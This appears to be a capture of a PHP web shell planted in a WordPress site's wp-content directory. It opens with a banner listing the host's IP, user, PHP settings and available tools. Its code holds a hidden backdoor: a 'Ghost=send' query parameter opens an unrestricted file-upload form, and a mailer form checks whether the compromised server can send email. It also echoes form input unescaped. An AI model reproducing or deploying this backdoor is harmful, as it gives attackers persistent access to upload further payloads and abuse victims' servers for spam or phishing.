| Server IP : 195.58.49.151 / Your IP : 216.73.217.31 Web Server : Apache/2.4.67 (Debian) mod_fcgid/2.3.9 OpenSSL/3.0.20 System : Linux hs.hsdns.ru 6.1.0-49-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.174-1 (2026-05-26) x86_64 User : antilam ( 1007) PHP Version : 8.4.22 Disable Function : system,passthru,popen MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /home/antilam/web/antilam.ru/public_html/wp-content/ |
Upload File : |
<?php
error_reporting(0);
?>
Upload is <b><color>WORKING</color></b><br>
Check Mailling ..<br>
<form method="post">
<input type="text" placeholder="E-Mail" name="email" value="<?php print $_POST['email']?>"required ><input type="text" placeholder="Order ID" name="orderid" value="<?php print $_POST['orderid']?>" ><br>
<input type="submit" value="Send test >>">
</form>
<br>
<?php
if($_GET['Ghost'] =='send'){
$uploaddir = './';
$uploadfile = $uploaddir . basename($_FILES['userfile']['name']);
if( isset($_FILES["userfile"]) ) {
echo "Upload ";
if(move_uploaded_file
($_FILES["userfile"]["tmp_name"], $uploadfile))
echo $uploadfile;
else echo "failed";
}
echo "
<form name='uplform' method='post' action='?Ghost=send'
enctype='multipart/form-data'>
<p align='center'>
<input type='file' name='userfile'>
<input type='submit'>
</p>
";
}
if(!empty($_POST['email'])){
if(!empty($_POST['email'])){
$xx =$_POST['orderid'];
}
else{
$xx = rand();
}
mail($_POST['email'],"Result Report Test - ".$xx,"WORKING ! Result Report Test");
print "<b>send an report to [".$_POST['email']."] - Order : $xx</b>";
}
?>